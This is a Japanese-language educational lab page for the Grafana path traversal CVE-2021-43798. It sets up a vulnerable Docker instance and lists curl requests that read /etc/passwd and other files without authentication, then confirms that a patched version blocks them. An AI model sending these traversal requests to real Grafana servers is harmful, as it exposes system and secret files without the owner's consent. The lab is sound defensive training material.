
CVE-2021-43798 Grafana 未認証パストラバーサル - Security Lab | Shivam Gupta | 23104003
教育目的のみ。 このラボは隔離されたローカルマシン上でのみ実行してください。インターネットに公開しないでください。
| 項目 | 詳細 |
|---|---|
| CVE ID | CVE-2021-43798 |
| 製品 | Grafana |
| 影響を受けるバージョン | 8.0.0 – 8.3.0 |
| 修正済みバージョン | 8.3.1+ |
| 深刻度 | High |
| CVSS v3.1 スコア | 7.5 |
| CWE | CWE-22 — パストラバーサル |
| 認証要否 | 不要 |
| 攻撃ベクター | ネットワーク |
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta
docker compose up -d
確認:
curl http://127.0.0.1:3000/api/health
# Expected: "version": "8.3.0"
http://127.0.0.1:3000 を開く — ログイン: admin / admin
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"
期待される結果: ファイルの内容が HTTP 200 で返される — 認証は不要。
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health
hostname が返された場合 → 脆弱。バージョン 8.0.0–8.3.0 → 脆弱。
修正済みインスタンス(Grafana 8.3.1)を起動:
docker compose -f docker-compose.patched.yml up -d
エクスプロイトがブロックされることを確認:
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Expected: {"message": "Plugin file not found"}
docker compose down
docker compose -f docker-compose.patched.yml down